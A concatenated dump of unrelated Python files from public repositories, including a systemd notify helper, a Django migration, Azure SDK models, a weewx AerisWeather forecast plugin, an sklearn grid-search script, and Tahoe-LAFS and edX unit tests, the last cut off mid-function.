socket listening for notifications from services.
This method removes the NOTIFY_SOCKET environment variable to ensure
notification is sent only once.
"""
_sd_notify(True, 'READY=1')
def onready(notify_socket, timeout):
"""Wait for systemd style notification on the socket.
:param notify_socket: local socket address
:type notify_socket: string
:param timeout: socket timeout
:type timeout: float
:returns: 0 service ready
1 service not ready
2 timeout occurred
"""
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.settimeout(timeout)
sock.bind(_abstractify(notify_socket))
try:
msg = sock.recv(512)
except socket.timeout:
return 2
finally:
sock.close()
if 'READY=1' in msg:
return 0
else:
return 1
if __name__ == '__main__':
# simple CLI for testing
if len(sys.argv) == 1:
notify()
elif len(sys.argv) >= 2:
timeout = float(sys.argv[1])
notify_socket = os.getenv('NOTIFY_SOCKET')
if notify_socket:
retval = onready(notify_socket, timeout)
sys.exit(retval)
|
emawind84/readthedocs.org
|
refs/heads/master
|
readthedocs/builds/migrations/0001_initial.py
|
34
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import readthedocs.builds.version_slug
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
('projects', '0001_initial'),
('taggit', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Build',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(default=b'html', max_length=55, verbose_name='Type', choices=[(b'html', 'HTML'), (b'pdf', 'PDF'), (b'epub', 'Epub'), (b'man', 'Manpage'), (b'dash', 'Dash')])),
('state', models.CharField(default=b'finished', max_length=55, verbose_name='State', choices=[(b'triggered', 'Triggered'), (b'cloning', 'Cloning'), (b'installing', 'Installing'), (b'building', 'Building'), (b'finished', 'Finished')])),
('date', models.DateTimeField(auto_now_add=True, verbose_name='Date')),
('success', models.BooleanField(default=True, verbose_name='Success')),
('setup', models.TextField(null=True, verbose_name='Setup', blank=True)),
('setup_error', models.TextField(null=True, verbose_name='Setup error', blank=True)),
('output', models.TextField(default=b'', verbose_name='Output', blank=True)),
('error', models.TextField(default=b'', verbose_name='Error', blank=True)),
('exit_code', models.IntegerField(null=True, verbose_name='Exit code', blank=True)),
('commit', models.CharField(max_length=255, null=True, verbose_name='Commit', blank=True)),
('length', models.IntegerField(null=True, verbose_name='Build Length', blank=True)),
('builder', models.CharField(max_length=255, null=True, verbose_name='Builder', blank=True)),
('project', models.ForeignKey(related_name='builds', verbose_name='Project', to='projects.Project')),
],
options={
'ordering': ['-date'],
'get_latest_by': 'date',
},
),
migrations.CreateModel(
name='Version',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(default=b'unknown', max_length=20, verbose_name='Type', choices=[(b'branch', 'Branch'), (b'tag', 'Tag'), (b'unknown', 'Unknown')])),
('identifier', models.CharField(max_length=255, verbose_name='Identifier')),
('verbose_name', models.CharField(max_length=255, verbose_name='Verbose Name')),
('slug', readthedocs.builds.version_slug.VersionSlugField(populate_from=b'verbose_name', max_length=255, verbose_name='Slug', db_index=True)),
('supported', models.BooleanField(default=True, verbose_name='Supported')),
('active', models.BooleanField(default=False, verbose_name='Active')),
('built', models.BooleanField(default=False, verbose_name='Built')),
('uploaded', models.BooleanField(default=False, verbose_name='Uploaded')),
('privacy_level', models.CharField(default=b'public', help_text='Level of privacy for this Version.', max_length=20, verbose_name='Privacy Level', choices=[(b'public', 'Public'), (b'protected', 'Protected'), (b'private', 'Private')])),
('machine', models.BooleanField(default=False, verbose_name='Machine Created')),
('project', models.ForeignKey(related_name='versions', verbose_name='Project', to='projects.Project')),
('tags', taggit.managers.TaggableManager(to='taggit.Tag', through='taggit.TaggedItem', blank=True, help_text='A comma-separated list of tags.', verbose_name='Tags')),
],
options={
'ordering': ['-verbose_name'],
'permissions': (('view_version', 'View Version'),),
},
),
migrations.CreateModel(
name='VersionAlias',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('from_slug', models.CharField(default=b'', max_length=255, verbose_name='From slug')),
('to_slug', models.CharField(default=b'', max_length=255, verbose_name='To slug', blank=True)),
('largest', models.BooleanField(default=False, verbose_name='Largest')),
('project', models.ForeignKey(related_name='aliases', verbose_name='Project', to='projects.Project')),
],
),
migrations.AddField(
model_name='build',
name='version',
field=models.ForeignKey(related_name='builds', verbose_name='Version', to='builds.Version', null=True),
),
migrations.AlterUniqueTogether(
name='version',
unique_together=set([('project', 'slug')]),
),
migrations.AlterIndexTogether(
name='build',
index_together=set([('version', 'state', 'type')]),
),
]
|
desteam/android_kernel_huawei_msm7x30
|
refs/heads/cm-12.0
|
tools/perf/util/setup.py
|
4998
|
#!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
|
zhakui/python
|
refs/heads/master
|
NKUCodingCat/0019/0019.py
|
40
|
#coding=utf-8
import xlrd, json, os
from lxml import etree
path = os.path.split(os.path.realpath(__file__))[0]+"/"
data = xlrd.open_workbook(path+"numbers.xls")
table = data.sheets()[0]
nrows = table.nrows
Dict = []
for i in range(nrows ):
Arr = table.row_values(i)
Dict.append(Arr)
root = etree.Element("root")
child1 = etree.SubElement(root, "numbers")
comm = etree.Comment(u"""数字信息""")
child1.append(comm)
child1.text =unicode(json.dumps(Dict).decode("utf-8"))
tree = etree.ElementTree(root)
tree.write(path+"numbers.xml ", pretty_print=True, xml_declaration=True, encoding='utf-8')
|
SUSE/azure-sdk-for-python
|
refs/heads/master
|
azure-mgmt-compute/azure/mgmt/compute/compute/v2016_04_30_preview/models/sub_resource.py
|
29
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class SubResource(Model):
"""SubResource.
:param id: Resource Id
:type id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(self, id=None):
self.id = id
|
v-iam/azure-sdk-for-python
|
refs/heads/master
|
azure-mgmt-storage/azure/mgmt/storage/v2016_12_01/models/storage_account_regenerate_key_parameters.py
|
5
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class StorageAccountRegenerateKeyParameters(Model):
"""The parameters used to regenerate the storage account key.
:param key_name:
:type key_name: str
"""
_validation = {
'key_name': {'required': True},
}
_attribute_map = {
'key_name': {'key': 'keyName', 'type': 'str'},
}
def __init__(self, key_name):
self.key_name = key_name
|
hes19073/hesweewx
|
refs/heads/master
|
bin/user/forecastAeris.py
|
1
|
# -*- coding: utf-8 -*-
# $Id: forecastAeris.py 1651 2020-09-24 12:10:37Z hes $
# original by Pat O'Brien, August 19, 2018
# Copyright 2020 Hartmut Schweidler
#
# Wetter Prognose by AerisWeather
""" in skin.conf
[Extras]
# forecastAeris ny aerisWeather
forecast_enabled = 0
# getAeris
forecast_provider = aeris
forecast_api_id =
forecast_api_secret
forecast_stale = 3450
# forecast_aeris_limit =
forecast_lang = de
forecast_units = si
"""
from __future__ import absolute_import
import datetime
import logging
import time
import calendar
import json
import os
import weewx
import weecfg
import weeutil.weeutil
import weeutil.logger
import weewx.units
from weewx.cheetahgenerator import SearchList
from weewx.tags import TimespanBinder
from weeutil.weeutil import TimeSpan
log = logging.getLogger(__name__)
# Print version in syslog
VERSION = "3.0.2"
log.info("Forcast AerisWeather version %s", VERSION)
class getAeris(SearchList):
def __init__(self, generator):
SearchList.__init__(self, generator)
def get_extension_list(self, timespan, db_lookup):
""" Download and parse the Forecast data.
von AerisWeather
This is required for the majority of the theme to work
"""
# Setup label dict for text and titles
try:
d = self.generator.skin_dict['Labels']['Generic']
except KeyError:
d = {}
label_dict = weeutil.weeutil.KeyDict(d)
# Setup database manager
binding = self.generator.config_dict['StdReport'].get('data_binding', 'wx_binding')
manager = self.generator.db_binder.get_manager(binding)
# Find the right HTML ROOT
if 'HTML_ROOT' in self.generator.skin_dict:
html_root = os.path.join(self.generator.config_dict['WEEWX_ROOT'],
self.generator.skin_dict['HTML_ROOT'])
else:
html_root = os.path.join(self.generator.config_dict['WEEWX_ROOT'],
self.generator.config_dict['StdReport']['HTML_ROOT'])
# Return right away if we're not going to use the forecast.
if self.generator.skin_dict['Extras']['forecast_enabled'] == "0":
# Return an empty SLE
search_list_extension = {
'forecast_updated': '',
'forecastHTML' : '',
}
return [search_list_extension]
"""
Forecast Data
"""
forecast_provider = self.generator.skin_dict['Extras']['forecast_provider']
forecast_file = "/home/weewx/archive/forecastAeris.json"
forecast_api_id = self.generator.skin_dict['Extras']['forecast_api_id']
forecast_api_secret = self.generator.skin_dict['Extras']['forecast_api_secret']
forecast_units = self.generator.skin_dict['Extras']['forecast_units'].lower()
latitude = self.generator.config_dict['Station']['latitude']
longitude = self.generator.config_dict['Station']['longitude']
forecast_stale_timer = self.generator.skin_dict['Extras']['forecast_stale']
forecast_is_stale = False
def aeris_coded_weather(data):
# https://www.aerisweather.com/support/docs/api/reference/weather-codes/
output = ""
coverage_code = data.split(":")[0]
intensity_code = data.split(":")[1]
weather_code = data.split(":")[2]
cloud_dict = {
"CL": label_dict["forecast_cloud_code_CL"],
"FW": label_dict["forecast_cloud_code_FW"],
"SC": label_dict["forecast_cloud_code_SC"],
"BK": label_dict["forecast_cloud_code_BK"],
"OV": label_dict["forecast_cloud_code_OV"],
}
coverage_dict = {
"AR": label_dict["forecast_coverage_code_AR"],
"BR": label_dict["forecast_coverage_code_BR"],
"C": label_dict["forecast_coverage_code_C"],
"D": label_dict["forecast_coverage_code_D"],
"FQ": label_dict["forecast_coverage_code_FQ"],
"IN": label_dict["forecast_coverage_code_IN"],
"IS": label_dict["forecast_coverage_code_IS"],
"L": label_dict["forecast_coverage_code_L"],
"NM": label_dict["forecast_coverage_code_NM"],
"O": label_dict["forecast_coverage_code_O"],
"PA": label_dict["forecast_coverage_code_PA"],
"PD": label_dict["forecast_coverage_code_PD"],
"S": label_dict["forecast_coverage_code_S"],
"SC": label_dict["forecast_coverage_code_SC"],
"VC": label_dict["forecast_coverage_code_VC"],
"WD": label_dict["forecast_coverage_code_WD"],
}
intensity_dict = {
"VL": label_dict["forecast_intensity_code_VL"],
"L": label_dict["forecast_intensity_code_L"],
"H": label_dict["forecast_intensity_code_H"],
"VH": label_dict["forecast_intensity_code_VH"],
}
weather_dict = {
"A": label_dict["forecast_weather_code_A"],
"BD": label_dict["forecast_weather_code_BD"],
"BN": label_dict["forecast_weather_code_BN"],
"BR": label_dict["forecast_weather_code_BR"],
"BS": label_dict["forecast_weather_code_BS"],
"BY": label_dict["forecast_weather_code_BY"],
"F": label_dict["forecast_weather_code_F"],
"FR": label_dict["forecast_weather_code_FR"],
"H": label_dict["forecast_weather_code_H"],
"IC": label_dict["forecast_weather_code_IC"],
"IF": label_dict["forecast_weather_code_IF"],
"IP": label_dict["forecast_weather_code_IP"],
"K": label_dict["forecast_weather_code_K"],
"L": label_dict["forecast_weather_code_L"],
"R": label_dict["forecast_weather_code_R"],
"RW": label_dict["forecast_weather_code_RW"],
"RS": label_dict["forecast_weather_code_RS"],
"SI": label_dict["forecast_weather_code_SI"],
"WM": label_dict["forecast_weather_code_WM"],
"S": label_dict["forecast_weather_code_S"],
"SW": label_dict["forecast_weather_code_SW"],
"T": label_dict["forecast_weather_code_T"],
"UP": label_dict["forecast_weather_code_UP"],
"VA": label_dict["forecast_weather_code_VA"],
"WP": label_dict["forecast_weather_code_WP"],
"ZF": label_dict["forecast_weather_code_ZF"],
"ZL": label_dict["forecast_weather_code_ZL"],
"ZR": label_dict["forecast_weather_code_ZR"],
"ZY": label_dict["forecast_weather_code_ZY"],
}
# Check if the weather_code is in the cloud_dict and use that if it's there. If not then it's a combined weather code.
if weather_code in cloud_dict:
return cloud_dict[weather_code];
else:
# Add the coverage if it's present, and full observation forecast is requested
if coverage_code:
output += coverage_dict[coverage_code] + " : "
# Add the intensity if it's present
if intensity_code:
output += intensity_dict[intensity_code] + " : "
# Weather output
output += weather_dict[weather_code];
return output
def aeris_icon(data):
# https://www.aerisweather.com/support/docs/api/reference/icon-list/
icon_name = data.split(".")[0]; # Remove .png
icon_dict = {
"blizzard": "snow",
"blizzardn": "snow",
"blowingsnow": "snow",
"blowingsnown": "snow",
"clear": "clear-day",
"clearn": "clear-night",
"cloudy": "cloudy",
"cloudyn": "cloudy",
"cloudyw": "cloudy",
"cloudywn": "cloudy",
"cold": "clear-day",
"coldn": "clear-night",
"drizzle": "rain",
"drizzlen": "rain",
"dust": "fog",
"dustn": "fog",
"fair": "clear-day",
"fairn": "clear-night",
"drizzlef": "rain",
"fdrizzlen": "rain",
"flurries": "sleet",
"flurriesn": "sleet",
"flurriesw": "sleet",
"flurrieswn": "sleet",
"fog": "fog",
"fogn": "fog",
"freezingrain": "rain",
"freezingrainn": "rain",
"hazy": "fog",
"hazyn": "fog",
"hot": "clear-day",
"N/A ": "unknown",
"mcloudy": "partly-cloudy-day",
"mcloudyn": "partly-cloudy-night",
"mcloudyr": "rain",
"mcloudyrn": "rain",
"mcloudyrw": "rain",
"mcloudyrwn": "rain",
"mcloudys": "snow",
"mcloudysn": "snow",
"mcloudysf": "snow",
"mcloudysfn": "snow",
"mcloudysfw": "snow",
"mcloudysfwn": "snow",
"mcloudysw": "partly-cloudy-day",
"mcloudyswn": "partly-cloudy-night",
"mcloudyt": "thunderstorm",
"mcloudytn": "thunderstorm",
"mcloudytw": "thunderstorm",
"mcloudytwn": "thunderstorm",
"mcloudyw": "partly-cloudy-day",
"mcloudywn": "partly-cloudy-night",
"na": "unknown",
"pcloudy": "partly-cloudy-day",
"pcloudyn": "partly-cloudy-night",
"pcloudyr": "rain",
"pcloudyrn": "rain",
"pcloudyrw": "rain",
"pcloudyrwn": "rain",
"pcloudys": "snow",
"pcloudysn": "snow",
"pcloudysf": "snow",
"pcloudysfn": "snow",
"pcloudysfw": "snow",
"pcloudysfwn": "snow",
"pcloudysw": "partly-cloudy-day",
"pcloudyswn": "partly-cloudy-night",
"pcloudyt": "thunderstorm",
"pcloudytn": "thunderstorm",
"pcloudytw": "thunderstorm",
"pcloudytwn": "thunderstorm",
"pcloudyw": "partly-cloudy-day",
"pcloudywn": "partly-cloudy-night",
"rain": "rain",
"rainn": "rain",
"rainandsnow": "rain",
"rainandsnown": "rain",
"raintosnow": "rain",
"raintosnown": "rain",
"rainw": "rain",
"rainw": "rain",
"showers": "rain",
"showersn": "rain",
"showersw": "rain",
"showersw": "rain",
"sleet": "sleet",
"sleetn": "sleet",
"sleetsnow": "sleet",
"sleetsnown": "sleet",
"smoke": "fog",
"smoken": "fog",
"snow": "snow",
"snown": "snow",
"snoww": "snow",
"snowwn": "snow",
"snowshowers": "snow",
"snowshowersn": "snow",
"snowshowersw": "snow",
"snowshowerswn": "snow",
"snowtorain": "snow",
"snowtorainn": "snow",
"sunny": "clear-day",
"sunnyn": "clear-night",
"sunnyw": "partly-cloudy-day",
"sunnywn": "partly-cloudy-night",
"tstorm": "thunderstorm",
"tstormn": "thunderstorm",
"tstorms": "thunderstorm",
"tstormsn": "thunderstorm",
"tstormsw": "thunderstorm",
"tstormswn": "thunderstorm",
"wind": "wind",
"wind": "wind",
"wintrymix": "sleet",
"wintrymixn": "sleet",
}
return icon_dict[icon_name]
# Quelle
forecast_url = "https://api.aerisapi.com/forecasts/%s,%s?&format=json&filter=day&limit=7&client_id=%s&client_secret=%s" % (latitude, longitude, forecast_api_id, forecast_api_secret)
# Determine if the file exists and get it's modified time
if os.path.isfile(forecast_file):
if (int(time.time()) - int(os.path.getmtime(forecast_file))) > int(forecast_stale_timer):
forecast_is_stale = True
else:
# File doesn't exist, download a new copy
forecast_is_stale = True
# File is stale, download a new copy
if forecast_is_stale:
try:
try:
# Python 3
from urllib.request import Request, urlopen
except ImportError:
# Python 2
from urllib2 import Request, urlopen
user_agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'
headers = { 'User-Agent' : user_agent }
# Forecast
req = Request( forecast_url, None, headers )
response = urlopen( req )
forecast_page = response.read()
response.close()
try:
forecast_file_result = json.dumps( {"timestamp": int(time.time()), "forecast": [json.loads(forecast_page)]} )
except:
forecast_file_result = json.dumps( {"timestamp": int(time.time()), "forecast": [json.loads(forecast_page.decode('utf-8'))]} )
except Exception as error:
raise Warning( "Error downloading forecast data. Check the URL in your configuration and try again. You are trying to use URL: %s, and the error is: %s" % ( forecast_url, error ) )
# Save forecast data to file. w+ creates the file if it doesn't exist, and truncates the file and re-writes it everytime
try:
with open( forecast_file, 'wb+' ) as file:
# Python 2/3
try:
file.write( forecast_file_result.encode('utf-8') )
except:
file.write( forecast_file_result )
log.info( "New forecast file downloaded to %s" % forecast_file )
except IOError as e:
raise Warning( "Error writing forecast info to %s. Reason: %s" % ( forecast_file, e) )
# Process the forecast file
with open( forecast_file, "r" ) as read_file:
data = json.load( read_file )
html_output = ""
#forecast_updated = time.strftime("%d.%m.%Y %H:%M", time.localtime(data["forecast"][0]["response"][0]["periods"][0]["timestamp"]))
forecast_updated = time.strftime("%d.%m.%Y %H:%M", time.localtime(data["timestamp"]))
for daily_data in data["forecast"][0]["response"][0]["periods"]:
image_url = "xicons/AerisIcons/" + daily_data['icon']
condition_text = aeris_coded_weather(daily_data["weatherPrimaryCoded"])
#condition_text = daily_data["weatherPrimary"]
# Build html
if time.strftime( "%a %m/%d", time.localtime( daily_data["timestamp"] ) ) == time.strftime( "%a %m/%d", time.localtime( time.time() ) ):
# If the time in the darksky output is today, do not add border-left and say "Today" in the header
output = '<div class="col-sm-1-5 wuforecast">'
weekday = "Heute"
else:
output = '<div class="col-sm-1-5 wuforecast border-left">'
weekday = time.strftime( "%a: %d.%m.%Y", time.localtime( daily_data["timestamp"] ) )
output += '<span id="weekday">' + weekday + '</span>'
output += '<br>'
output += '<div class="forecast-conditions">'
output += '<img id="icon" src="'+image_url+'">'
output += '<br>'
output += '<span class="forecast-condition-text">'
output += condition_text
output += '</span>'
output += '</div>'
output += '<span class="hes1_valhi">'+str(int(daily_data["maxTempC"])) + '°C</span> | <span class="hes1_vallo">'+str(int(daily_data["minTempC"]))+ '°C</span>'
output += '<br><br>'
output += '<div class="forecast-precip">'
if int(daily_data["pop"]) > 0:
output += 'Niederschlag: <span> ' + str(int(daily_data["pop"])) + ' </span>%'
if int(daily_data["snowCM"]) > 0:
output += '<div class="snow-precip">'
output += '<img src="xicons/snowflake-icon-15px.png"> <span>'+ str(int(daily_data["snowCM"])) + '</span> cm'
output += '</div>'
elif int(daily_data["precipMM"]) > 0:
output += '<div class="rain-precip">'
output += '<img src="xicons/raindrop.png"><span >'+ str(int(daily_data["precipMM"])) + ' </span> mm'
output += '</div>'
else:
output += 'Niederschlag: <span > 0%</span>'
output += '</div>'
output += '<div class="forecast-wind">'
output += '<img src="xicons/strong-wind.svg"><span> aus: <b>' + daily_data["windDir"] + '</b></span><br>'
output += '<span> '+ str(int(daily_data["windSpeedKPH"])) + ' bis ' + str(int(daily_data["windGustKPH"])) + ' km/h </span><br>'
output += '<img src="xicons/strong-wind.svg"><span>in 80 m: <b>' + daily_data["windDir80m"] + '</b></span><br>'
output += '<span> '+ str(int(daily_data["windSpeed80mKPH"])) + ' bis ' + str(int(daily_data["windGust80mKPH"])) + ' km/h </span>'
output += '</div> <!-- end wind --> '
output += '</div> <!-- end aeris forecast -->'
output += '<br>'
# Add to the output
html_output += output
# Put into a dictionary to return
search_list_extension = {
'forecast_updated': forecast_updated,
'forecastHTML' : html_output,
}
# Finally, return our extension as a list:
return [search_list_extension]
|
rasbt/bugreport
|
refs/heads/master
|
scikit-learn/gridsearch_memory/code/naive_bayes_scripts/bernoulli_gridsearch_1.py
|
1
|
# Sebastian Raschka 2014
import os
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.grid_search import GridSearchCV
from time import time
from sklearn.pipeline import Pipeline
from sklearn.naive_bayes import MultinomialNB, BernoulliNB
import pandas as pd
from nltk.stem.porter import PorterStemmer
from nltk.stem.snowball import EnglishStemmer
import pickle
from sklearn import cross_validation
master_dir = os.path.dirname(os.path.realpath(__file__))
###########################################
# Setting up tokenizer
###########################################
stop_words = pickle.load(open(os.path.join(master_dir, '../stopwords.p'), 'rb'))
semantic_words = pickle.load((open(os.path.join(master_dir, '../whitelist/semantic_words.p'), 'rb')))
porter = PorterStemmer()
snowball = EnglishStemmer()
# raw words
# tokenizer = lambda text: text.split()
def tokenizer(text):
return text.split()
# words after Porter stemming
# tokenizer_porter = lambda text: [porter.stem(word) for word in text.split()]
def tokenizer_porter(text):
return [porter.stem(word) for word in text.split()]
# Words after Snowball stemming
# tokenizer_snowball = lambda text: [snowball.stem(word) for word in text.split()]
def tokenizer_snowball(text):
return [snowball.stem(word) for word in text.split()]
# Only words that are in a list of 'positive' or 'negative' words ('whitelist')
# http://www.cs.uic.edu/~liub/FBS/sentiment-analysis.html#lexicon
#tokenizer_whitelist = lambda text: [word for word in text.split() if word in semantic_words]
def tokenizer_whitelist(text):
return [word for word in text.split() if word in semantic_words]
# Porter-stemmed words in whitelist
# tokenizer_porter_wl = lambda text: [porter.stem(word) for word in text.split() if word in semantic_words]
def tokenizer_porter_wl(text):
return [porter.stem(word) for word in text.split() if word in semantic_words]
# Snowball-stemmed words in whitelist
# tokenizer_snowball_wl = lambda text: [snowball.stem(word) for word in text.split() if word in semantic_words]
def tokenizer_snowball_wl(text):
return [snowball.stem(word) for word in text.split() if word in semantic_words]
###########################################
# Loading training data
###########################################
df_train = pd.read_csv(os.path.join(master_dir, '../../data/labeledTrainData.tsv'), sep='\t', quoting=3)
df_test = pd.read_csv(os.path.join(master_dir, '../../data/testData.tsv'), sep='\t', quoting=3)
X_train = df_train['review']
y_train = df_train['sentiment']
###########################################
# Pipeline of feature extractor, classifier, and parameters
###########################################
pipeline_ber = Pipeline([
('vec', CountVectorizer(binary=True)),
('clf', BernoulliNB())])
parameters_ber = {
'vec__tokenizer': (tokenizer, tokenizer_porter, tokenizer_snowball,
tokenizer_whitelist, tokenizer_porter_wl, tokenizer_snowball_wl),
'vec__max_df': (0.5, 0.75, 1.0),
'vec__max_features': (None, 5000),
'vec__min_df': (1, 50),
'vec__stop_words': [None, stop_words],
'vec__ngram_range' : [(1,1), (1,2), (2,2)],}
###########################################
## Run GridSearch
###########################################
grid_search = GridSearchCV(pipeline_ber,
parameters_ber,
n_jobs=1,
cv=3,
scoring='roc_auc',
verbose=2)
t0 = time()
print('Start Gridsearch')
grid_search.fit(X_train, y_train)
print('\n\n\n\n{0}\nREPORT\n{0} '.format(50*'#'))
print('done in {0}s'.format(time() - t0))
print('Best score: {0}'.format(grid_search.best_score_))
print('Best parameters set:')
best_parameters = grid_search.best_estimator_.get_params()
for param_name in sorted(list(parameters.keys())):
print('\t{0}: {1}'.format(param_name, best_parameters[param_name]))
print('\n\n\n All Scores:')
print(grid_search.grid_scores_)
|
pombredanne/tahoe-lafs
|
refs/heads/master
|
src/allmydata/test/test_ftp.py
|
6
|
from twisted.trial import unittest
from allmydata.frontends import ftpd
from allmydata.immutable import upload
from allmydata.mutable import publish
from allmydata.test.no_network import GridTestMixin
from allmydata.test.common_util import ReallyEqualMixin
class Handler(GridTestMixin, ReallyEqualMixin, unittest.TestCase):
"""
This is a no-network unit test of ftpd.Handler and the abstractions
it uses.
"""
FALL_OF_BERLIN_WALL = 626644800
TURN_OF_MILLENIUM = 946684800
def _set_up(self, basedir, num_clients=1, num_servers=10):
self.basedir = "ftp/" + basedir
self.set_up_grid(num_clients=num_clients, num_servers=num_servers)
self.client = self.g.clients[0]
self.username = "alice"
self.convergence = ""
d = self.client.create_dirnode()
def _created_root(node):
self.root = node
self.root_uri = node.get_uri()
self.handler = ftpd.Handler(self.client, self.root, self.username,
self.convergence)
d.addCallback(_created_root)
return d
def _set_metadata(self, name, metadata):
"""Set metadata for `name', avoiding MetadataSetter's timestamp reset
behavior."""
def _modifier(old_contents, servermap, first_time):
children = self.root._unpack_contents(old_contents)
children[name] = (children[name][0], metadata)
return self.root._pack_contents(children)
return self.root._node.modify(_modifier)
def _set_up_tree(self):
# add immutable file at root
immutable = upload.Data("immutable file contents", None)
d = self.root.add_file(u"immutable", immutable)
# `mtime' and `linkmotime' both set
md_both = {'mtime': self.FALL_OF_BERLIN_WALL,
'tahoe': {'linkmotime': self.TURN_OF_MILLENIUM}}
d.addCallback(lambda _: self._set_metadata(u"immutable", md_both))
# add link to root from root
d.addCallback(lambda _: self.root.set_node(u"loop", self.root))
# `mtime' set, but no `linkmotime'
md_just_mtime = {'mtime': self.FALL_OF_BERLIN_WALL, 'tahoe': {}}
d.addCallback(lambda _: self._set_metadata(u"loop", md_just_mtime))
# add mutable file at root
mutable = publish.MutableData("mutable file contents")
d.addCallback(lambda _: self.client.create_mutable_file(mutable))
d.addCallback(lambda node: self.root.set_node(u"mutable", node))
# neither `mtime' nor `linkmotime' set
d.addCallback(lambda _: self._set_metadata(u"mutable", {}))
return d
def _compareDirLists(self, actual, expected):
actual_list = sorted(actual)
expected_list = sorted(expected)
self.failUnlessReallyEqual(len(actual_list), len(expected_list),
"%r is wrong length, expecting %r" % (
actual_list, expected_list))
for (a, b) in zip(actual_list, expected_list):
(name, meta) = a
(expected_name, expected_meta) = b
self.failUnlessReallyEqual(name, expected_name)
self.failUnlessReallyEqual(meta, expected_meta)
def test_list(self):
keys = ("size", "directory", "permissions", "hardlinks", "modified",
"owner", "group", "unexpected")
d = self._set_up("list")
d.addCallback(lambda _: self._set_up_tree())
d.addCallback(lambda _: self.handler.list("", keys=keys))
expected_root = [
('loop',
[0, True, ftpd.IntishPermissions(0600), 1, self.FALL_OF_BERLIN_WALL, 'alice', 'alice', '??']),
('immutable',
[23, False, ftpd.IntishPermissions(0600), 1, self.TURN_OF_MILLENIUM, 'alice', 'alice', '??']),
('mutable',
# timestamp should be 0 if no timestamp metadata is present
[0, False, ftpd.IntishPermissions(0600), 1, 0, 'alice', 'alice', '??'])]
d.addCallback(lambda root: self._compareDirLists(root, expected_root))
return d
|
openiitbombayx/edx-platform
|
refs/heads/master
|
openedx/core/djangoapps/user_api/tests/test_middleware.py
|
152
|
"""Tests for user API middleware"""
from mock import Mock, patch
from unittest import TestCase
from django.http import HttpResponse
from django.test.client import RequestFactory
from student.tests.factories import UserFactory, AnonymousUserFactory
from ..tests.factories import UserCourseTagFactory
from ..middleware import UserTagsEventContextMiddleware
class TagsMiddlewareTest(TestCase):
"""
Test the UserTagsEventContextMiddleware
"""
def setUp(self):
super(TagsMiddlewareTest, self).setUp()
self.middleware = UserTagsEventContextMiddleware()
self.user = UserFactory.create()
self.other_user = UserFactory.create()
self.course_id = 'mock/course/id'
self.request_factory = RequestFactory()
# TODO: Make it so we can use reverse. Appears to fail depending on the order in which tests are run
#self.request = RequestFactory().get(reverse('courseware', kwargs={'course_id': self.course_id}))
self.request = RequestFactory().get('/courses/{}/courseware'.format(self.course_id))
self.request.user = self.user
self.response = Mock(spec=HttpResponse)
patcher = patch('openedx.core.djangoapps.user_api.middleware.tracker')
self.tracker = patcher.start()
self.addCleanup(patcher.stop)
def process_request(self):
"""
Execute process request using the request, and verify that it returns None
so that the request continues.
"""
# Middleware should pass request through
self.assertEquals(self.middleware.process_request(self.request), None)
def assertContextSetTo(self, context):
"""Asserts UserTagsEventContextMiddleware.CONTEXT_NAME matches ``context``"""
self.tracker.get_tracker.return_value.enter_context.assert_called_with( # pylint: disable=maybe-no-member
UserTagsEventContextMiddleware.CONTEXT_NAME,
context
)
def test_tag_context(self):
for key, value in (('int_value', 1), ('str_value', "two")):
UserCourseTagFactory.create(
course_id=self.course_id,
user=self.user,
key=key,
value=value,
)
UserCourseTagFactory.create(
course_id=self.course_id,
user=self.other_user,
key="other_user",
value="other_user_value"
)
UserCourseTagFactory.create(
course_id='other/course/id',
user=self.user,
key="other_course",
value="other_course_value"
)
self.process_request()
self.assertContextSetTo({
'course_id': self.course_id,
'course_user_tags': {
'int_value': '1',
'str_value': 'two',
}
})
def test_no_tags(self):
self.process_request()
self.assertContextSetTo({'course_id': self.course_id, 'course_user_tags': {}})
def test_not_course_url(self):
self.request = self.request_factory.get('/not/a/course/url')
self.request.user = self.user
self.process_request()
self.assertContextSetTo({})
def test_invalid_course_id(self):
